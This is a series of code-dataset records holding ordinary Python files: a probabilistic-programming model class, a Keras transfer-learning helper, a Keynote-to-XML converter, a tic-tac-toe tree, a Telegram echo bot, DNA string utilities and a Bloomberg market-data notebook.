data['traces']\n        if util._cuda_enabled:\n            for trace in traces:\n                trace.cuda()\n        return traces\n\n    def save_analytics(self, file_name, detailed_traces=2):\n        if self._inference_network is None:\n            raise RuntimeError('Analytics is currently available only with a trained inference network. Use learn_inference_network first.')\n        save_report(self, file_name, detailed_traces=detailed_traces)\n\n\nclass ModelRemote(Model):\n    def __init__(self, server_address='tcp://127.0.0.1:5555'):\n        self._server_address = server_address\n        self._model_server = ModelServer(server_address)\n        super().__init__('{} running on {}'.format(self._model_server.model_name, self._model_server.system_name))\n\n    def __enter__(self):\n        return self\n\n    def __exit__(self, exception_type, exception_value, traceback):\n        self.close()\n\n    def __del__(self):\n        self.close()\n\n    def close(self):\n        self._model_server.close()\n\n    def forward(self, observation=None):\n        return self._model_server.forward(observation)\n","sub_path":"pyprob/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":22050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"421404776","text":"from keras import Input, Model\n\n#from keras.applications.xception import Xception\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nimport efficientnet.keras as efn\n\n\nfrom keras.layers import Flatten, Dense, Dropout\nfrom keras.layers import GlobalAveragePooling2D, BatchNormalization\nfrom os import path\n\n\ndef frozen_networks(input_size, n_classes, local_weights=None):\n    if local_weights and path.exists(local_weights):\n        print(f'Using {local_weights} as local weights.')\n        model_ = efn.EfficientNetB5(\n            include_top=False,  # no classifier head; we attach our own below (for fine-tuning)\n            input_tensor=Input(shape=input_size),\n            weights=local_weights)\n    else:\n        print(\n            f'Could not find local weights {local_weights} for Model. Using remote weights.')\n        model_ = efn.EfficientNetB5(\n            include_top=False,\n            input_tensor=Input(shape=input_size),\n            weights='noisy-student')\n\n    
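# Transfer learning: freeze every pretrained backbone layer so that only the\n    # new classification head added below is trained. (To fine-tune later, one\n    # could unfreeze the top backbone blocks and recompile with a lower learning\n    # rate - a suggestion, not something this module does.)\n    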
for layer in model_.layers:\n        layer.trainable = False  # freeze the loaded model's weights so they are not updated during training\n    x = GlobalAveragePooling2D()(model_.layers[-1].output)\n    #x = BatchNormalization()(x)\n    x = Dense(n_classes, activation='softmax')(x)\n    frozen_model = Model(model_.input, x)\n\n    #frozen_model.summary()  # print the model architecture\n    return frozen_model\n","sub_path":"spam/spam/spam_classifier/networks/STNetworks.py","file_name":"STNetworks.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"113282795","text":"import appscript\nimport shutil, os, sys\nimport itertools\nfrom contextlib import closing\nimport lxml.etree as ET\n\nfilepath = \"demo.key\" # sys.argv[1]\nkeynote = appscript.app('Keynote')\nkeynote_file = appscript.mactypes.File(filepath)\n\nwith closing(keynote.open(keynote_file)) as doc:\n    notes = doc.slides.presenter_notes()\n    skipped = doc.slides.skipped()\n    notes = list(itertools.compress(notes, [not s for s in skipped]))\n\n    texts = []\n    hotwords = []\n    for note in notes:\n        lines = note.strip().splitlines()\n\n        text = r\"\\n\".join(lines[:-1])\n        texts.append(text)\n\n        assert lines[-1].startswith(':')\n        hotword = lines[-1].lstrip(':').strip()\n        hotwords.append(hotword)\n\nresources = ET.Element(\"resources\")\nET.SubElement(resources, \"integer\", name=\"nslides\").text = str(len(notes))\ntexts_ = ET.SubElement(resources, \"string-array\", name=\"texts\")\nfor text in texts:\n    ET.SubElement(texts_, \"item\").text = text\nhotwords_ = ET.SubElement(resources, \"string-array\", name=\"hotwords\")\nfor hotword in hotwords:\n    ET.SubElement(hotwords_, \"item\").text = hotword\ntree = ET.ElementTree(resources)\ntree.write(\"keynote.xml\", pretty_print=True)\n","sub_path":"keynote2xml.py","file_name":"keynote2xml.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"60712848","text":"from btnode import BTNode\n\n\nclass BTree:\n    \"\"\"Represent a binary tree\"\"\"\n\n    def __init__(self, root=None):\n        self.root = root\n\n    def expand(self, node, value):\n        \"\"\"Expand a binary tree of all states in Tic-tac-toe\"\"\"\n        board = node.data\n        if board.isFull():\n            return None\n        node.left = BTNode(board.make_random_move(value))\n        node.right = BTNode(board.make_random_move(value))\n        if node.left.data.get_winner() == 0:\n            self.expand(node.left, -value)\n        if node.right.data.get_winner() == 0:\n            self.expand(node.right, -value)\n\n    def compute_value(self, node):\n        \"\"\"Compute the number of AI victories in the subtree below node\"\"\"\n        if node.data.get_winner():\n            return node.data.get_winner() * 100\n        if node.data.isFull():\n            return -50\n        return self.compute_value(node.left) + self.compute_value(node.right)\n\n    def get_best_move(self):\n        \"\"\"Compute the best move by comparing, for each move the AI can make,\n        the number of AI victories in the resulting subtree.\"\"\"\n        if self.compute_value(self.root.left) < self.compute_value(self.root.right):\n            return self.root.left.data\n        else:\n            return self.root.right.data\n
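\n# Illustrative usage sketch (the Board object and BTNode come from elsewhere in\n# this project, so their exact API is assumed rather than shown here):\n#     tree = BTree(BTNode(board))   # board: the current game state\n#     tree.expand(tree.root, 1)     # enumerate continuations for player +1\n#     best = tree.get_best_move()   # child board with the higher value\n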
","sub_path":"binary_tree/btree.py","file_name":"btree.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"71427648","text":"import sys\nimport os\nimport os.path\nimport readInput\nfrom os.path import join as pj\n\ndef write_surfrend_script(conname, connum, swd, thresh, exthresh):\n    \"\"\"\n    Writes out the .m file with MATLAB calls to surfrend_canonical.m.\n    \"\"\"\n    mfile_script = pj(swd, conname+\".m\")\n    commands = []\n    commands.append(\"warning off all\")\n    mlab_cmd = \"surfrend_canonical\"\n    commands.append(\"%s('%s', %s, '%s', %s, %s)\" % (mlab_cmd, conname, connum, swd, thresh, exthresh))\n    commands.append('exit;')\n    write_file_with_list(mfile_script, commands, conname, swd)\n\n\ndef write_file_with_list(path, lines, conname, swd, quiet=False):\n    \"\"\"\n    Write the given lines to path, one per line.\n    \"\"\"\n    try:\n        with open(path,'w') as f:\n            text = '\\n'.join(lines)\n            f.write(text + '\\n')\n        # make_lingua(path)\n        if not quiet:\n            print(\"Hi! Wrote %s/%s.m\" % (swd,conname))\n    except IOError:\n        raise\n\n\n\nif __name__ == \"__main__\":\n    write_surfrend_script(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])\n","sub_path":"write_surfrend_script.py","file_name":"write_surfrend_script.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"591420169","text":"from telegram_api.telegram_bot import TelegramBot\n\n\nclass TelegramBotImpl(TelegramBot):\n    def __init__(self, bot_name, access_token):\n        super(TelegramBotImpl, self).__init__(bot_name, access_token)\n\n    def handler(self, msg):\n        content_type, chat_type, chat_id = TelegramBot.glance(msg)\n\n        if content_type == 'text':\n            # Echo the text back; read msg['text'] only for text messages.\n            self.bot.sendMessage(chat_id, msg['text'])\n        else:\n            self.bot.sendMessage(chat_id, 'That type of message is not valid')\n","sub_path":"example_echo_bot/telegram_bot_impl.py","file_name":"telegram_bot_impl.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"409712080","text":"# Author : Adrian Carlos A. de Vera\n# CMSC 128 Programming Assignment 2\n# March 12, 2016\n\n# returns the number of times str1 and str2 differ in character at the same position\ndef getHammingDistance(str1, str2):\n\tif len(str1) <= 0 or len(str2) <= 0:\n\t\treturn \"Error! Strings have invalid length.\"\n\n\tif len(str1) != len(str2):\n\t\treturn \"Error! Strings are not of equal length.\"\n\n\tdist = 0\n\n\tfor i in range(len(str1)):\n\t\tif str1[i] != str2[i]:\n\t\t\tdist += 1\n\n\treturn dist\n\n
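# Illustrative check (an added example, not part of the original assignment):\n# 'GATTACA' and 'GACTATA' differ at positions 2 and 5, so the distance is 2.\nassert getHammingDistance('GATTACA', 'GACTATA') == 2\n\n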
# returns the number of times the string pattern appears in the string original\ndef countSubstrPattern(original, pattern):\n\tnum = 0\n\tfor i in range(len(original)):\n\t\tif original[i:i + len(pattern)] == pattern:\n\t\t\tnum += 1\n\treturn num\n\n# returns True if all characters in the string are in the set of letters\ndef isValidString(string, letters):\n\tfor i in range(len(string)):\n\t\tfor j in range(len(letters)):\n\t\t\tif string[i] == letters[j]:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tif j == len(letters) - 1:\n\t\t\t\t\treturn False\n\treturn True\n\n# returns the number of G minus the number of C in the string up to its nth letter\ndef getSkew(string, n):\n\tnumG = 0\n\tnumC = 0\n\n\tif n <= 0:\n\t\treturn \"Error! Invalid Skew number.\"\n\telse:\n\t\tfor i in range(n):\n\t\t\tif string[i] == \"G\":\n\t\t\t\tnumG += 1\n\t\t\telif string[i] == \"C\":\n\t\t\t\tnumC += 1\n\n\treturn numG - numC\n\n# returns the maximum skew (number of G minus number of C) over all prefixes of\n# the string up to its nth letter; the empty prefix counts as skew 0\ndef getMaxSkewN(string, n):\n\tnumG = 0\n\tnumC = 0\n\tval = 0\n\tif n <= 0:\n\t\treturn \"Error! Invalid Skew number.\"\n\telse:\n\t\tfor i in range(n):\n\t\t\tif string[i] == \"G\":\n\t\t\t\tnumG += 1\n\t\t\telif string[i] == \"C\":\n\t\t\t\tnumC += 1\n\t\t\tval = val if val > (numG - numC) else (numG - numC)\n\n\treturn val\n\n# returns the minimum skew (number of G minus number of C) over all prefixes of\n# the string up to its nth letter; the running minimum starts at 0 because the\n# empty prefix counts as skew 0\ndef getMinSkewN(string, n):\n\tnumG = 0\n\tnumC = 0\n\tval = 0\n\tif n <= 0:\n\t\treturn \"Error! Invalid Skew number.\"\n\telse:\n\t\tfor i in range(n):\n\t\t\tif string[i] == \"G\":\n\t\t\t\tnumG += 1\n\t\t\telif string[i] == \"C\":\n\t\t\t\tnumC += 1\n\t\t\tval = val if val < (numG - numC) else (numG - numC)\n\n\treturn val","sub_path":"deVeraSBL.py","file_name":"deVeraSBL.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
{"seq_id":"630519172","text":"# ---\n# jupyter:\n#   jupytext:\n#     formats: ipynb,py:percent\n#     text_representation:\n#       extension: .py\n#       format_name: percent\n#       format_version: '1.2'\n#     jupytext_version: 1.2.4\n#   kernelspec:\n#     display_name: Python 3\n#     language: python\n#     name: python3\n# ---\n\n# %%\nimport cma_gui as cma\nimport pandas as pd\n\nfrom datetime import date\nfrom datetime import datetime\nfrom dateutil.relativedelta import relativedelta\nfrom xbbg import blp\n\n# %% [markdown]\n# # As of Date\n\n# %%\n# Date range for Bloomberg data pulls\nend_date = cma.end_date\nend_date_str = end_date.strftime('%m-%d-%Y')\n\nstart_date = end_date - relativedelta(years=30)\nstart_date_str = start_date.strftime('%m-%d-%Y')\n\n# %% [markdown]\n# # Equity Data\n\n# %% [markdown]\n# ## USD\n\n# %%\n# Bloomberg field for gross-of-dividend daily total returns\ndata_return = ['DAY_TO_DAY_TOT_RETURN_GROSS_DVDS']\n\n# %%\nequity_name_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_us_name' in k}.values())))\nequity_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_us_code' in k}.values())))\nequity_dictionary = dict(zip(equity_list, equity_name_list))\n\n# %%\nequity_returns = blp.bdh(tickers=equity_list, flds=data_return, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nequity_returns.columns = 
equity_returns.columns.droplevel(1)\nequity_returns.columns = equity_returns.columns.map(equity_dictionary)\n\n# Convert index to datetime\nequity_returns.index = pd.to_datetime(equity_returns.index)\n\n# Adjust dataframe for varying month end dates\nequity_returns = equity_returns.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ## Non-USD\n\n# %%\n# Bloomberg code to pull index values\ndata_return_nonus = ['PX_LAST']\n\n# %%\n# Reference for future renaming of columns\nequity_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_nonus_code' in k}.values())))\nequity_name_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'equity_nonus_name' in k}.values())))\nequity_dictionary_nonus = dict(zip(equity_list_nonus, equity_name_list_nonus))\n\n# %%\nequity_returns_nonus = blp.bdh(tickers=equity_list_nonus, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nequity_returns_nonus.columns = equity_returns_nonus.columns.droplevel(1)\nequity_returns_nonus.columns = equity_returns_nonus.columns.map(equity_dictionary_nonus)\n\n# Convert index to datetime\nequity_returns_nonus.index = pd.to_datetime(equity_returns_nonus.index)\n\n# Adjust dataframe for varying month end dates\nequity_returns_nonus = equity_returns_nonus.resample('M', axis=0).mean()\nequity_returns_nonus = equity_returns_nonus.reindex(columns=equity_name_list_nonus)\n\n# %% [markdown]\n# # Fixed Income Data\n\n# %% [markdown]\n# ## USD - Fixed\n\n# %%\n# Reference for future renaming of columns\nfixed_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_us_code' in k}.values())))\nfixed_name_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_us_name' in k}.values())))\nfixed_dictionary = dict(zip(fixed_list, fixed_name_list))\n\n# %% [markdown]\n# ### USD Fixed Returns\n\n# %%\nfixed_returns = blp.bdh(tickers=fixed_list, flds=data_return, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_returns.columns = fixed_returns.columns.droplevel(1)\nfixed_returns.columns = fixed_returns.columns.map(fixed_dictionary)\n\n# Convert index to datetime\nfixed_returns.index= pd.to_datetime(fixed_returns.index)\n\n# Adjust dataframe for varying month end dates\nfixed_returns = fixed_returns.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ### USD Fixed Yields\n\n# %%\nfixed_yields = blp.bdh(tickers=fixed_list, flds='YIELD_TO_WORST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_yields.columns = fixed_yields.columns.droplevel(1)\nfixed_yields.columns = fixed_yields.columns.map(fixed_dictionary)\n\n# Convert index to datetime\nfixed_yields.index = pd.to_datetime(fixed_yields.index)\n\n# Adjust dataframe for varying month end dates\nfixed_yields = fixed_yields.resample('M', axis=0).mean()\n\n# %%\n# Add bank loan yields\nbank_loan_yield = blp.bdh(tickers='SPBDLLY Index', flds='PX_LAST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nbank_loan_yield.columns = bank_loan_yield.columns.droplevel(1)\n\n# Adjust dataframes for varying month end dates\nbank_loan_yield = bank_loan_yield.resample('M', axis=0).mean()\n\n# %%\n# Combine with other yield results\nfixed_yields['U.S. 
Bank Loans'] = bank_loan_yield\n\n# %% [markdown]\n# ### USD Fixed Spreads\n\n# %%\nfixed_spreads = blp.bdh(tickers=fixed_list, flds='INDEX_OAS_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_spreads.columns = fixed_spreads.columns.droplevel(1)\nfixed_spreads.columns = fixed_spreads.columns.map(fixed_dictionary)\n\n# Fill for indices with no spread\nfixed_spreads['U.S. TIPS'] = 0\nfixed_spreads['U.S. Intermediate Municipal'] = 0\nfixed_spreads['U.S. Short Municipal'] = 0\n\n# Convert index to datetime\nfixed_spreads.index = pd.to_datetime(fixed_spreads.index)\n\n# Adjust dataframe for varying month end dates\nfixed_spreads = fixed_spreads.resample('M', axis=0).mean()\n\n# Add bank loan spread estimate\nfixed_spreads['U.S. Bank Loans'] = fixed_yields['U.S. Bank Loans'] - fixed_yields['U.S. Treasury Bills']\n\n# %% [markdown]\n# ### USD Fixed Duration\n\n# %%\nfixed_durations = blp.bdh(tickers=fixed_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\ntips_duration = blp.bdh(tickers='BCIT1T Index', flds='MODIFIED_DURATION', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_durations.columns = fixed_durations.columns.droplevel(1)\nfixed_durations.columns = fixed_durations.columns.map(fixed_dictionary)\n\n# Add constant for bank loan spreads\nfixed_durations['U.S. Bank Loans'] = 0.25\nfixed_durations['U.S. TIPS'] = tips_duration\n\n# Convert index to datetime\nfixed_durations.index = pd.to_datetime(fixed_durations.index)\n\n# Adjust dataframe for varying month end dates\nfixed_durations = fixed_durations.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ## Non USD - Fixed\n\n# %%\n# Reference for future renaming of columns\nfixed_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_nonus_code' in k}.values())))\nfixed_name_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'fixed_nonus_name' in k}.values())))\nfixed_dictionary_nonus = dict(zip(fixed_list_nonus, fixed_name_list_nonus))\n\n# %% [markdown]\n# ### Non-USD Fixed Returns\n\n# %%\nfixed_returns_nonus = blp.bdh(tickers=fixed_list_nonus, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_returns_nonus.columns = fixed_returns_nonus.columns.droplevel(1)\nfixed_returns_nonus.columns = fixed_returns_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_returns_nonus.index= pd.to_datetime(fixed_returns_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_returns_nonus = fixed_returns_nonus.resample('M', axis=0).mean()\nfixed_returns_nonus = fixed_returns_nonus.reindex(columns=fixed_name_list_nonus)\n\n# %% [markdown]\n# ### Non-USD Fixed Yields\n\n# %%\nfixed_yields_nonus = blp.bdh(tickers=fixed_list_nonus, flds='YIELD_TO_WORST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_yields_nonus.columns = fixed_yields_nonus.columns.droplevel(1)\nfixed_yields_nonus.columns = fixed_yields_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_yields_nonus.index = pd.to_datetime(fixed_yields_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_yields_nonus = fixed_yields_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ### Non-USD Fixed Spreads\n\n# %%\nfixed_spreads_nonus = blp.bdh(tickers=fixed_list_nonus, flds='INDEX_OAS_TSY', 
start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_spreads_nonus.columns = fixed_spreads_nonus.columns.droplevel(1)\nfixed_spreads_nonus.columns = fixed_spreads_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_spreads_nonus.index = pd.to_datetime(fixed_spreads_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_spreads_nonus = fixed_spreads_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ### Non-USD Fixed Duration\n\n# %%\nfixed_durations_nonus = blp.bdh(tickers=fixed_list_nonus, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_durations_nonus.columns = fixed_durations_nonus.columns.droplevel(1)\nfixed_durations_nonus.columns = fixed_durations_nonus.columns.map(fixed_dictionary_nonus)\n\n# Convert index to datetime\nfixed_durations_nonus.index = pd.to_datetime(fixed_durations_nonus.index)\n\n# Adjust dataframe for varying month end dates\nfixed_durations_nonus = fixed_durations_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# # Treasury Data\n\n# %% [markdown]\n# ## US Treasury Data\n\n# %%\ntreasury_list = ['I00087 Index', 'BTB5STAT Index', 'BW10STAT Index', 'BW30STAT Index']\ntreasury_dictionary = {'I00087 Index': '3 Mo', 'BTB5STAT Index': '5 Yr', 'BW10STAT Index': '10 Yr', 'BW30STAT Index': '30 Yr'}\n\n# %%\n# Treasury Yields\nfixed_treasury_yld = blp.bdh(tickers=treasury_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_treasury_yld.columns = fixed_treasury_yld.columns.droplevel(1)\nfixed_treasury_yld.columns = fixed_treasury_yld.columns.map(treasury_dictionary)\n\n# %%\n# Treasury Duration\nfixed_treasury_dur = blp.bdh(tickers=treasury_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nfixed_treasury_dur.columns = fixed_treasury_dur.columns.droplevel(1)\nfixed_treasury_dur.columns = fixed_treasury_dur.columns.map(treasury_dictionary)\n\n# %% [markdown]\n# ## Global Treasury Data\n\n# %%\ngl_treasury_list = ['LGY3TRUU Index', 'I04790 Index', 'LG7YSTAT Index', 'LGY7TRUU Index','LGY1TRUU Index']\ngl_treasury_dictionary = {'LGY3TRUU Index': '1-3 Yr', 'I04790 Index': '3-5 Yr', 'LG7YSTAT Index': '5-7 Yr',\n                          'LGY7TRUU Index': '7-10 Yr','LGY1TRUU Index': '10+ Yr'}\n\n# %%\n# Gl Treasury Yields\ngl_fixed_treasury_yld = blp.bdh(tickers=gl_treasury_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_treasury_yld.columns = gl_fixed_treasury_yld.columns.droplevel(1)\ngl_fixed_treasury_yld.columns = gl_fixed_treasury_yld.columns.map(gl_treasury_dictionary)\n\n# %%\n# Gl Treasury Durations\ngl_fixed_treasury_dur = blp.bdh(tickers=gl_treasury_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_treasury_dur.columns = gl_fixed_treasury_dur.columns.droplevel(1)\ngl_fixed_treasury_dur.columns = gl_fixed_treasury_dur.columns.map(gl_treasury_dictionary)\n\n# %% [markdown]\n# ## Global Agg Data\n\n# %%\ngl_agg_list = ['H16607US Index', 'H16608US Index', 'H16609US Index', 'H16610US Index','H16611US Index']\ngl_agg_dictionary = {'H16607US Index': '1-3 Yr', 'H16608US Index': '3-5 Yr', 'H16609US Index': '5-7 Yr',\n                     'H16610US Index': '7-10 Yr','H16611US Index': '10+ Yr'}\n\n
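# %% [markdown]\n# The pull / droplevel / map / resample sequence above repeats for every index\n# family. A helper along the lines of the sketch below could factor it out.\n# This is only an illustration: 'pull_monthly' is a hypothetical name, and it\n# assumes blp.bdh returns the same two-level column index as in the calls\n# above. The cells below still use the explicit pattern.\n\n# %%\ndef pull_monthly(tickers, field, names):\n    df = blp.bdh(tickers=tickers, flds=field, start_date=start_date_str, end_date=end_date_str, Per='M')\n    df.columns = df.columns.droplevel(1)    # drop the field level\n    df.columns = df.columns.map(names)      # map tickers to readable names\n    df.index = pd.to_datetime(df.index)     # normalize the index to datetime\n    return df.resample('M', axis=0).mean()  # align varying month-end dates\n\n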
# %%\n# Gl Agg Yields\ngl_fixed_agg_yld = blp.bdh(tickers=gl_agg_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_agg_yld.columns = gl_fixed_agg_yld.columns.droplevel(1)\ngl_fixed_agg_yld.columns = gl_fixed_agg_yld.columns.map(gl_agg_dictionary)\n\n# %%\n# Gl Agg Durations\ngl_fixed_agg_dur = blp.bdh(tickers=gl_agg_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_agg_dur.columns = gl_fixed_agg_dur.columns.droplevel(1)\ngl_fixed_agg_dur.columns = gl_fixed_agg_dur.columns.map(gl_agg_dictionary)\n\n# %%\n# Gl Agg Spreads\ngl_fixed_agg_spread = blp.bdh(tickers=gl_agg_list, flds='INDEX_OAS_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\ngl_fixed_agg_spread.columns = gl_fixed_agg_spread.columns.droplevel(1)\ngl_fixed_agg_spread.columns = gl_fixed_agg_spread.columns.map(gl_agg_dictionary)\n\n# %% [markdown]\n# ## EM Treasury Data\n\n# %%\nem_treasury_list = ['I22843US Index', 'I22844US Index', 'I22845US Index', 'I22846US Index', 'I22847US Index']\nem_treasury_dictionary = {'I22843US Index': '1-3 Yr', 'I22844US Index': '3-5 Yr', 'I22845US Index': '5-7 Yr', 'I22846US Index': '7-10 Yr','I22847US Index': '10+ Yr'}\n\n# %%\n# EM Treasury Yields\nem_fixed_treasury_yld = blp.bdh(tickers=em_treasury_list, flds='INDEX_YIELD_TO_MATURITY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nem_fixed_treasury_yld.columns = em_fixed_treasury_yld.columns.droplevel(1)\nem_fixed_treasury_yld.columns = em_fixed_treasury_yld.columns.map(em_treasury_dictionary)\n\n# %%\n# EM Treasury Duration\nem_fixed_treasury_dur = blp.bdh(tickers=em_treasury_list, flds='INDEX_OAD_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nem_fixed_treasury_dur.columns = em_fixed_treasury_dur.columns.droplevel(1)\nem_fixed_treasury_dur.columns = em_fixed_treasury_dur.columns.map(em_treasury_dictionary)\n\n# %% [markdown]\n# ## AA Corp Data (for Muni Calcs)\n\n# %%\naa_corp_list = ['I08219 Index']\naa_corp_dictionary = {'I08219 Index': 'AA Corp'}\n\n# %%\n# AA Corp Spreads\naa_corp_spread = blp.bdh(tickers=aa_corp_list, flds='INDEX_OAS_TSY', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\naa_corp_spread.columns = aa_corp_spread.columns.droplevel(1)\naa_corp_spread.columns = aa_corp_spread.columns.map(aa_corp_dictionary)\n\n# %% [markdown]\n# # Alts Data\n\n# %% [markdown]\n# ## USD - Alts\n\n# %%\n# Reference for future renaming of columns\nalts_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_us_code' in k}.values())))\nalts_name_list = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_us_name' in k}.values())))\nalts_dictionary = dict(zip(alts_list, alts_name_list))\n\n# %%\nalts_returns = blp.bdh(tickers=alts_list, flds=data_return, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nalts_returns.columns = alts_returns.columns.droplevel(1)\nalts_returns.columns = alts_returns.columns.map(alts_dictionary)\n\n# Convert index to datetime\nalts_returns.index = pd.to_datetime(alts_returns.index)\n\n# Adjust dataframe for varying month end dates\nalts_returns = alts_returns.resample('M', axis=0).mean()\n\n# %% [markdown]\n# ## Non USD - Alts\n\n# %%\n# Reference for future renaming of columns\nalts_list_nonus = 
list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_nonus_code' in k}.values())))\nalts_name_list_nonus = list(filter(None, list({k:v for (k,v) in cma.val_dict.items() if 'alts_nonus_name' in k}.values())))\nalts_dictionary_nonus = dict(zip(alts_list_nonus, alts_name_list_nonus))\n\n# %%\nalts_returns_nonus = blp.bdh(tickers=alts_list_nonus, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nalts_returns_nonus.columns = alts_returns_nonus.columns.droplevel(1)\nalts_returns_nonus.columns = alts_returns_nonus.columns.map(alts_dictionary_nonus)\n\n# Convert index to datetime\nalts_returns_nonus.index = pd.to_datetime(alts_returns_nonus.index)\n\n# Adjust dataframe for varying month end dates\nalts_returns_nonus = alts_returns_nonus.resample('M', axis=0).mean()\n\n# %% [markdown]\n# # Currency\n\n# %%\ncurrencies = ['AUD', 'CAD', 'CHF', 'DKK', 'EUR', 'GBP', 'JPY', 'NOK', 'NZD', 'SEK']\ncross_currencies = ['USD' + x + ' Curncy' for x in currencies]\n\n# Map each Bloomberg cross ticker (e.g. 'USDAUD Curncy') to its currency code\ncross_currencies_dictionary = dict(zip(cross_currencies, currencies))\n\n# %%\nhistorical_cross_currencies = blp.bdh(tickers=cross_currencies, flds='PX_LAST', start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nhistorical_cross_currencies.columns = historical_cross_currencies.columns.droplevel(1)\nhistorical_cross_currencies.columns = historical_cross_currencies.columns.map(cross_currencies_dictionary)\n\n# Convert index to datetime\nhistorical_cross_currencies.index = pd.to_datetime(historical_cross_currencies.index)\n\n# Adjust dataframe for varying month end dates\nhistorical_cross_currencies = historical_cross_currencies.resample('M', axis=0).mean()\nhistorical_cross_currencies['USD'] = 1\n\n# %% [markdown]\n# # Beta Index Data\n\n# %%\nbeta_list = 'EMUSTRUU Index'\nbeta_dictionary = {'EMUSTRUU Index': 'Emerging Debt Agg USD'}\n\n# %%\nbeta_returns = blp.bdh(tickers=beta_list, flds=data_return_nonus, start_date=start_date_str, end_date=end_date_str, Per='M')\n\n# Rename and reorder columns\nbeta_returns.columns = beta_returns.columns.droplevel(1)\nbeta_returns.columns = beta_returns.columns.map(beta_dictionary)\n\n# Convert index to datetime\nbeta_returns.index = pd.to_datetime(beta_returns.index)\n\n# Adjust dataframe for varying month end dates\nbeta_returns = beta_returns.resample('M', axis=0).mean()\n\n# %%\n# Add the beta return needed for the fixed non-US data\nfixed_returns_nonus = fixed_returns_nonus.join(beta_returns)\n\n# %% [markdown]\n# # Save Data to Excel\n\n# %%\nwith pd.ExcelWriter(r'P:\\\\Advisory\\\\Research\\\\Automation\\\\CMAs\\\\Data\\\\bloomberg_data_us.xlsx') as writer:\n    equity_returns.to_excel(writer, sheet_name='equity_returns')\n    